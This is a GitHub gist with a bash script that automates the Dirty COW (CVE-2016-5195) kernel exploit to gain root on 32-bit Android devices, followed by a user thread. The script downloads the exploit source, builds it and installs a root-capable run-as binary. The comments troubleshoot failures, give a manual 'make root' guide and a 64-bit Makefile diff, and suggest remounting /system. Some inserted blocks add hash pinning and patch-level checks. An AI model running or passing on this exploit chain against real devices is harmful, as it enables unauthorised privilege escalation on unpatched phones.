"Root" via dirtyc0w privilege escalation exploit (automation script) / Android (32 bit)
#!/bin/bash
# Give the usual warning.
clear;
# "-e" makes echo interpret the \n escapes (plain echo in bash prints them literally).
echo -e "[INFO] Automated Android root script started.\n\n[WARN] Exploit requires sdk module \"NDK\".\nFor more information, visit the installation guide @ https://goo.gl/E2nmLF\n[INFO] Press Ctrl+C to stop the script if you need to install the NDK module. Waiting 10 seconds...";
sleep 10;
clear;
# Download and extract exploit files.
echo "[INFO] Downloading exploit files from GitHub...";
workspacezip="dirtyc0w_workspace.zip";
workspace="dirtyc0w_workspace";
rm -f "$workspacezip" > /dev/null; # Remove zip if it exists
rm -rf "$workspace" > /dev/null; # Remove workspace if it exists
wget -O dirtyc0w_workspace.zip https://github.com/Arinerron/CVE-2016-5195/archive/master.zip > /dev/null 2>&1;
if [ -f "$workspacezip" ];
then
echo "[INFO] Extracting exploit files...";
unzip -a "$workspacezip" -d "$workspace" > /dev/null;
rm -f "$workspacezip"; # Remove zip now that it has been extracted
else
echo "[ERR] Failed to download exploit files.";
exit 1;
fi;
if [ -d "$workspace" ];
then
cd "$workspace" || exit 1; # Never fall through to the cleanup with $PWD still pointing at the caller's directory
directory=$PWD; # thx @tomdeboer!
cd CVE-2016-5195-master || exit 1;
else
echo "[ERR] Failed to extract exploit files.";
exit 1;
fi;
# Compile and send exploit.
echo "[INFO] Exploiting dirtyc0w vulnerability...";
sleep 1; # Let them read the message before chaos
make root || { echo "[ERR] make root failed; nothing was installed."; exit 1; };
clear;
# Hooray!
echo -en "[INFO] Complete. Installed package \"run-as\" on device.\n[INFO] Cleaning up workspace...";
rm -rf "$directory"; # Clean up workspace
echo "Done";
echo "[INFO] Starting shell in 3 seconds...";
sleep 3; # Look, it worked!
adb shell;
clear;
exit 0;
@Arinerron

Arinerron Oct 27, 2016

I put 'root' in quotes, because technically, it isn't rooting. However, it creates a binary called 'run-as' that can execute packages as root.

@beardog108

beardog108 Oct 27, 2016

Hey, Cool seeing you on front page of HN!

@Arinerron

Owner

Arinerron commented Oct 27, 2016

@beardog108 I am? :P

@ntcong

ntcong Oct 27, 2016

Well if you can execute as root, I'm pretty sure that qualified as rooting in this case.

@tomdeboer

tomdeboer Oct 27, 2016

It'd be nice to have a little check after the download and unzip to see if it worked, otherwise your $PWD will be recursively removed

Edit: Done.

@Arinerron

Arinerron Oct 27, 2016

@tomdeboer Haha, that's true. Revised the code.

@RenaKunisaki

RenaKunisaki Oct 27, 2016

Why does it download and execute a script from the web (and not even verify a hash!) instead of bundling the necessary files? (At least it uses HTTPS...)
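
The two review points raised in this thread (tomdeboer's: check that the download and unzip worked before anything is removed; RenaKunisaki's: the archive is fetched and executed without a hash check) can be fixed together. The block below is an added example, not code from the gist or from the CVE-2016-5195 repository: it refuses to extract an archive whose SHA-256 does not match a pinned value and refuses to delete anything other than the workspace it created. EXPECTED_SHA256 is a placeholder the operator must pin; the demo at the bottom runs offline on a constructed file.

```shell
#!/bin/sh
# Added example (not from the gist or the CVE-2016-5195 repo): fetch the
# archive only against a pinned SHA-256, extract only after the pin matches,
# and delete only the workspace this script created.
# EXPECTED_SHA256 is a placeholder: pin it to the digest of an archive you audited.
EXPECTED_SHA256="${EXPECTED_SHA256:-0000000000000000000000000000000000000000000000000000000000000000}"
WORKSPACE_NAME="dirtyc0w_workspace"

# Print the SHA-256 of a file with whichever tool the host provides.
sha256_of() {
    if command -v sha256sum >/dev/null 2>&1; then
        sha256sum "$1" | cut -d' ' -f1
    else
        shasum -a 256 "$1" | cut -d' ' -f1
    fi
}

# Succeed only if the file exists and its digest equals the pinned value.
verify_sha256() {
    vs_file="$1"; vs_expected="$2"
    [ -f "$vs_file" ] || { echo "[ERR] $vs_file is missing" >&2; return 1; }
    vs_actual=$(sha256_of "$vs_file")
    if [ "$vs_actual" != "$vs_expected" ]; then
        echo "[ERR] digest mismatch for $vs_file: got $vs_actual, want $vs_expected" >&2
        return 1
    fi
}

# Download, verify, then extract. A mismatching archive is deleted, never unzipped.
fetch_and_extract() {
    fe_url="$1"; fe_zip="$2"; fe_dir="$3"
    wget -O "$fe_zip" "$fe_url" || return 1
    verify_sha256 "$fe_zip" "$EXPECTED_SHA256" || { rm -f "$fe_zip"; return 1; }
    mkdir -p "$fe_dir" && unzip -q "$fe_zip" -d "$fe_dir" || return 1
    # The repo's zip unpacks to CVE-2016-5195-master; anything else means a bad archive.
    [ -d "$fe_dir/CVE-2016-5195-master" ]
}

# Remove a directory only if it is the workspace we created: never "", "/",
# the current directory, or a directory with a different name.
safe_cleanup() {
    sc_dir="$1"
    case "$sc_dir" in ""|/|"$PWD") return 1 ;; esac
    [ -d "$sc_dir" ] || return 1
    [ "$(basename "$sc_dir")" = "$WORKSPACE_NAME" ] || return 1
    rm -rf "$sc_dir"
}

# Offline demo on a constructed file: "hello\n" has a well-known SHA-256.
demo_dir=$(mktemp -d)
printf 'hello\n' > "$demo_dir/sample.zip"
printf 'hello!\n' > "$demo_dir/tampered.zip"
KNOWN=5891b5b522d5df086d0ff0b110fbd9d21bb4fc7163af34d08286a2e846f6be03
verify_sha256 "$demo_dir/sample.zip" "$KNOWN" && echo "[INFO] pinned digest matches"
verify_sha256 "$demo_dir/tampered.zip" "$KNOWN" || echo "[INFO] tampered archive rejected"
mkdir -p "$demo_dir/$WORKSPACE_NAME"
safe_cleanup "$PWD" || echo "[INFO] refused to remove \$PWD"
safe_cleanup "$demo_dir/$WORKSPACE_NAME" && echo "[INFO] workspace removed"
rm -rf "$demo_dir"
```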

@Arinerron

Arinerron Oct 27, 2016

@RenaKunisaki Right, I'll do that when I have time. Thanks.

@blizzard4591

blizzard4591 Oct 27, 2016

It does not work on my stock Samsung Galaxy S5 (Android 6.0.1 / patch level September 1, 2016 / kernel 3.4.0-8538464).

[*] mmap 0xb6d7b000
[*] exploit (patch)
[*] currently 0xb6d7b000=464c457f
[*] madvise = 0xb6d7b000 17920
[*] madvise = 0 1048576
[*] /proc/self/mem 1610612736 1048576
[*] exploited 0xb6d7b000=464c457f
/home/myUser/Android/Sdk/platform-tools/adb shell /system/bin/run-as
running as uid 2000
Could not set capabilities: Operation not permitted
setresgid/setresuid failed
uid 2000
Any ideas?

@Arinerron

Arinerron Oct 27, 2016

@blizzard4591 Hey. You're not the only one with that problem, actually. The reason why it doesn't work is (probably) because your phone has a 64-bit CPU. I haven't worked on a 64-bit version yet, but you can change a setting in the makefile so it compiles for a 64-bit architecture.

Edit: Here's an issue you might want to see: timwr/CVE-2016-5195#7

@MF064DD

MF064DD Oct 27, 2016

[INFO] Downloading exploit files from GitHub...
[ERR] Failed to download exploit files.

Is there something I'm doing wrong here?

@Arinerron

Arinerron Oct 27, 2016

@MF064DD Is there an error when you run:

wget -O dirtyc0w_workspace.zip https://github.com/Arinerron/CVE-2016-5195/archive/master.zip;

?

Edit: Oh, nevermind. Apparently wget doesn't accept variables in the parameters. I updated the script. Sorry for the inconvenience!

@SpyKnife

SpyKnife Oct 27, 2016

Still the same error: Failed to download exploit files

@MF064DD

MF064DD Oct 27, 2016

Still the same error: Failed to download exploit files

Exactly what he said. :p

Maybe I'm doing it wrong. I installed the necessary sdk modules and such.

Here's a visual.
https://streamable.com/h2qb

@SpyKnife

SpyKnife Oct 27, 2016

When I try to just execute the wget command I get this error:
Connecting to www.github.com (192.30.253.112:443) wget: can't execute 'ssl_helper': No such file or directory
wget: error getting response: Connection reset by peer

@Arinerron

Arinerron Oct 27, 2016

@MF064DD @SpyKnife Okay, sorry guys. The problem is that wget and unzip commands aren't being used properly. I can't fix it on my phone, because the editor isn't working. I won't have computer access till tonight (it's noon here, and I'm at school). Really sorry about the delay! I'll @mention you when it is fixed.

@MF064DD

MF064DD Oct 27, 2016

No problem man! Hey, you've got a life. I can wait as long as you need us to. ^^

@Arinerron

Arinerron Oct 28, 2016

@MF064DD @SpyKnife Okay, weird thing. I'm on my computer now, and I can execute the script fine. I think the reason why it works on my computer and not my laptop is because of the version of wget and/or unzip. Specifically, wget seems to not have SSL support on certain versions (probably yours too).

I'm not sure as of now how I can download files off the internet via bash without using 3rd parties (like curl). Here's a manual guide though:

Root Android 32-bit / Guide

Prerequisites

  • Linux machine with
    • adb
    • android-ndk
    • gcc
  • 32-bit Android device plugged in to computer

Steps

  1. Download the exploit from here.
  2. Extract the zip file
  3. Enter the extracted zip's directory in Terminal
  4. Run the following command:
make root && adb shell;

And tada! The run-as binary has been installed on your android system.

@Arinerron

Arinerron Oct 28, 2016

@blizzard4591 Here's a quote from the issue:

The device has a 64-bit architecture, so we need to use the arm64-v8a variant of the compiled binaries.

[This is how I modified the file]

diff --git a/Makefile b/Makefile
index 19e09b8..1dd61c3 100644
--- a/Makefile
+++ b/Makefile
@@ -5,8 +5,8 @@ build:
    ndk-build NDK_PROJECT_PATH=. APP_BUILD_SCRIPT=./Android.mk APP_PLATFORM=android-21

 push: build
-       adb push libs/armeabi/dirtycow /data/local/tmp/dirtycow
-       adb push libs/armeabi/run-as /data/local/tmp/run-as
+       adb push libs/arm64-v8a/dirtycow /data/local/tmp/dirtycow
+       adb push libs/arm64-v8a/run-as /data/local/tmp/run-as

 root: push
    adb shell 'chmod 777 /data/local/tmp/run-as'
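
Review bot: swapping the hardcoded libs/armeabi path for an equally hardcoded libs/arm64-v8a in the two `adb push` lines only moves the breakage from 64-bit devices to 32-bit ones, and the thread already shows both kinds in use. Make the ABI directory a Makefile variable instead, e.g. `ABI ?= armeabi` and `adb push libs/$(ABI)/run-as /data/local/tmp/run-as`, so the caller selects it from the first entry of `ro.product.cpu.abilist` quoted just below rather than editing the Makefile per device.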

A good way to get device's abi could be

$ adb shell 'getprop ro.product.cpu.abilist'
arm64-v8a,armeabi-v7a,armeabi

@RaPoZaUm

RaPoZaUm Oct 28, 2016

Total noob here: is it usable on an Exynos S7 Edge (G935F)? If so, would it trip Knox to 0x1 (I assume it won't, but asking to be sure)?

@kirbyfan64

kirbyfan64 Oct 28, 2016

Man, those semicolons are driving me crazy. :O This is just an automation script for CVE repo, right?

@MF064DD

MF064DD Oct 28, 2016

Cool, got that... now where do I go from here exactly? http://imgur.com/a/0rHeI

@Arinerron

@cmwedin

cmwedin Oct 28, 2016

I got run-as on my phone, but if I try to do anything with it I get permission denied. Has anyone been able to run things as root with this? My phone doesn't have a way to unlock the bootloader; could that have something to do with it?

@PVineeth

PVineeth Oct 28, 2016

Is this only for 32-bit Android phones?

@Arinerron

Arinerron Oct 28, 2016

Heh, here we go.

@RaPoZaUm Probably would work, but I haven't tested it.
@kirbyfan64 Yup
@MF064DD It should have installed a binary called run-as. You can open a terminal emulator on your phone and run stuff like run-as echo "pwned" > root_only_file.txt and write to it as root.
@cmwedin Sorry it isn't working. It might be that the binary is built for a 32-bit arch and your phone is 64. You can configure that. See my comment above. If it doesn't work, please report it here: https://github.com/timwr/CVE-2016-5195/issues Thanks!
@PVineeth The script is only built for 32-bit phones right now. You can exploit 64-bit phones though, too. See my comment above for more info.

@mauricioprado00

mauricioprado00 Oct 30, 2016

Does anyone have any idea what to use as the argument of run-as?

1|shell@peregrine:/ $ run-as
Usage: run-as <package-name> <command> [<args>]

Edit: I found what goes in package-name; this will give you a list of options:

pm list packages -f

but... it doesn't work. Example:

1|shell@peregrine:/ $ run-as com.google.android.apps.photos ls
run-as: Package 'com.google.android.apps.photos' is not debuggable

@cmwedin

cmwedin Oct 30, 2016

@Arinerron my phone is 32 bit :/

@MrMino

MrMino Nov 10, 2016

It won't work anyway. The exploit in question can't run anything out of its normal context, because SE for Android will catch it (darn you SELinux, ruining my dreams constantly since 1998), and the child/fork will run with the standard UID. I tried to run sh with system() and execp(), I tried to chown() it to root:root, and SUID/GUID it with chmod(). Nothing works. I think that editing an existing binary with SUID toggled might work, but I didn't try it - too much hassle for me, and generating a custom payload to do this is a bitch of a task for someone who doesn't know the architecture.

@tinxx

tinxx Nov 11, 2016

Have you taken into account that run-as is meant to give you different privileges and therefore would work within its threshold (SE-wise)?
I think it still could work with the correct run-as binary, not yet tested myself, though.

@garikay

garikay Dec 13, 2016

Arinerron, please make the automation script for 64-bit. I tried to modify it the way you showed, but I could not get it to work... I have a backup of the TA partition for my Sony XA Ultra, made via the dirtyc0w escalation exploit. Now I need the exploit to root, but I did not get it; please help me.

@Pcmster

Pcmster Dec 31, 2016

Hello, sorry if I'm not an expert, but when I execute "run-as" it shows:
running as uid 2000
uid 0
When I type "ls /data/app" it says Permission denied; what do I need to do?

@Fohroer

Fohroer Jan 1, 2017

Will this work on a Doogee X9 Pro, or will I brick my device with this? Will this script install SuperSU, or must I download it manually?

@Arinerron

Arinerron Jan 7, 2017

@PVineeth @MrMino @tinxx @garikay @Pcmster @Buranek

If you're tech-savvy (I assume you are since you are using GitHub), I made a more "hands on" tutorial here. :)

@MF064DD Sorry for the late response. Type adb shell, then run-as. You now are root on your phone.

Good luck! If that doesn't work, feel free to @mention me and I'll see if I can help.

@Rasmis

Rasmis Jan 10, 2017

I'm trying to use this to root a B&O Horizon running Android 5.1.1, and it doesn't seem to work. When I do run-as in adb shell I get this:

1|shell@bno_MT5593Uplus_EU:/ $ run-as
Usage: run-as <package-name> <command> [<args>]

If I try to run any package with run-as, it says run-as: Package '[ ]' is not debuggable. I've tried own packages, already installed packages, official and unofficial packages.

Any thoughts @Arinerron ?

@m4hmoud

m4hmoud Jan 19, 2017

I tried using this on LG G3 (with armeabi-v7a version), but I get this error:

could not open /system/bin/run-as

And run-as command gives me this:

run-as: can't execute: Permission denied

Does anybody have any suggestions?

@Melab

Melab Jan 29, 2017

@Arinerron Is there any way to do this WITHOUT modifying files on the system partition? I mean, if you can use this exploit to replace /system/bin/run-as, then surely you can use it to do the things that you'd use the new /system/bin/run-as to do, right?

@Deepak157

nice

@droidvoider

droidvoider Mar 1, 2017

@Arinerron setresgid/setresuid failed on my Note 5 arm64-v8a .. I don't really know where to begin to fix that but if I could get some elevation I could have some real fun. I am a programmer, just not an Android wizard.

@thaomvs

thaomvs Mar 9, 2017

Hi @Arinerron,
I installed run-as successfully. However, it still does not allow me to write the file.

shell@P1a42:/ # echo "pwned" > root_only_file.txt
/system/bin/sh: can't create root_only_file.txt: Read-only file system

Are there any extra steps to make it work?

@20esaua

20esaua Apr 12, 2017

@thaomvs Sorry about the late reply-- Simply executing run-as switches to the root user.

@sevenup30

sevenup30 May 12, 2017

Once I gain root access I can't remount system for installing the su binary:

# adb shell
athene_f:/ $ run-as
uid run-as 2000
uid 0
0 u:r:runas:s0
context 0 u:r:shell:s0
athene_f:/ # whoami
root
athene_f:/ # mount -o rw,remount /system
'/dev/block/bootdevice/by-name/system' is read-only
mount: '/dev/block/bootdevice/by-name/system'->'/system': Permission denied
1|athene_f:/ #

Any idea why?
I followed your guide
Root Android 32-bit / Guide
Prerequisites

Linux machine with
    adb
    android-ndk
    gcc
32-bit Android device plugged in to computer

Steps

Download the exploit from here.
Extract the zip file
Enter the extracted zip's directory in Terminal
Run the following command:

make root && adb shell;

and my phone is 32-bit

Thanks

@sick13

sick13 May 28, 2017

@Arinerron I have read through the comments and I have a question.
Installing "run-as" on Android through this script will allow me to, say, start FX File Manager with root permissions, and then I can delete/remove system apps? Correct?

@20esaua

20esaua Jun 6, 2017

@sevenup30 Try remounting /system using this command: mount -o rw,remount /dev/block/bootdevice/by-name/system /system
@sick13 Yes, correct. That should work.

@20esaua

20esaua Jun 6, 2017

@m4hmoud Sorry again for the late reply. Dirtycow was from last November-ish. Do you know if your system is already patched?
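
The question just asked (is the device already patched?) and the earlier `adb shell 'getprop ro.product.cpu.abilist'` tip can be turned into a small triage check for a fleet of devices. The block below is an added example, not code from the gist or the exploit repository: it parses the `[key]: [value]` lines that `adb shell getprop` prints and runs on constructed dumps embedded inline. The fix level 2016-11-06 is an assumption taken from the November 2016 Android security bulletin; check it against your vendor's bulletin.

```shell
#!/bin/sh
# Added example (not from the gist): triage `adb shell getprop` output for
# CVE-2016-5195 (dirtyc0w) exposure by security patch level, and report the
# primary ABI from ro.product.cpu.abilist. Assumption: the Android fix shipped
# at security patch level 2016-11-06 (November 2016 bulletin); adjust per vendor.
DIRTYCOW_FIX_LEVEL="2016-11-06"

# Extract one property from getprop dump text, whose lines look like
# "[ro.product.model]: [value]". Dots in the key are escaped for sed.
prop_value() {
    pv_key=$(printf '%s' "$1" | sed 's/\./\\./g')
    printf '%s\n' "$2" | sed -n "s/^\[$pv_key\]: \[\(.*\)\]\$/\1/p" | head -n 1
}

# Patch levels are YYYY-MM-DD, so sorting the two strings orders them by date.
# Returns 0 when the device level is at or after the fix level, 2 if there is
# no level at all (builds before Android 6.0 do not set the property).
patched_against_dirtycow() {
    pd_level="$1"
    [ -n "$pd_level" ] || return 2
    pd_latest=$(printf '%s\n%s\n' "$DIRTYCOW_FIX_LEVEL" "$pd_level" | sort | tail -n 1)
    [ "$pd_latest" = "$pd_level" ]
}

# The first entry of the comma-separated abilist is the primary ABI, i.e. the
# libs/<abi>/ directory name (arm64-v8a, armeabi-v7a, armeabi) the Makefile pushes from.
primary_abi() {
    printf '%s\n' "$1" | cut -d, -f1
}

# One-line verdict for one device's getprop dump.
triage() {
    tr_dump="$1"
    tr_model=$(prop_value ro.product.model "$tr_dump")
    tr_level=$(prop_value ro.build.version.security_patch "$tr_dump")
    tr_abi=$(primary_abi "$(prop_value ro.product.cpu.abilist "$tr_dump")")
    if patched_against_dirtycow "$tr_level"; then
        echo "$tr_model: patch level $tr_level (>= $DIRTYCOW_FIX_LEVEL), primary ABI $tr_abi: not exposed"
    else
        echo "$tr_model: patch level ${tr_level:-none} (< $DIRTYCOW_FIX_LEVEL), primary ABI $tr_abi: EXPOSED"
    fi
}

# Constructed sample dumps (not captured from real devices).
DEVICE_A='[ro.product.model]: [CONSTRUCTED-A]
[ro.build.version.security_patch]: [2016-09-01]
[ro.product.cpu.abilist]: [arm64-v8a,armeabi-v7a,armeabi]'
DEVICE_B='[ro.product.model]: [CONSTRUCTED-B]
[ro.build.version.security_patch]: [2017-01-05]
[ro.product.cpu.abilist]: [armeabi-v7a,armeabi]'
triage "$DEVICE_A"
triage "$DEVICE_B"
```

On a real device, feed `triage "$(adb shell getprop)"` the live dump; a device without a security_patch property is reported as exposed because the page's exploit predates the property being mandatory.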

@cyrexcyborg

cyrexcyborg Aug 31, 2017

Hi, I've done all the steps, but don't get any info apart from "exploited".

[*] size 14192
[*] mmap 0x7f7f3c5000
[*] currently 0x7f7f3c5000=10102464c457f
[*] using /proc/self/mem method
[*] madvise = 0x7f7f3c5000 14192
[*] madvise = 0 16777216
[*] /proc/self/mem 142459296 10038
[*] exploited 0 0x7f7f3c5000=10102464c457f
no info here

@walkman4321

walkman4321 Mar 14, 2018

@20esaua After running this command: mount -o rw,remount /dev/block/bootdevice/by-name/system /system
the terminal prompt hangs. It does not give any output or error.

@walkman4321

walkman4321 Mar 14, 2018

Is there something we have to write in place of "by-name"?

@FairyTail2000

FairyTail2000 Apr 8, 2018

So this script installs a custom version of run-as? Do I lose my guarantee if I use this script?
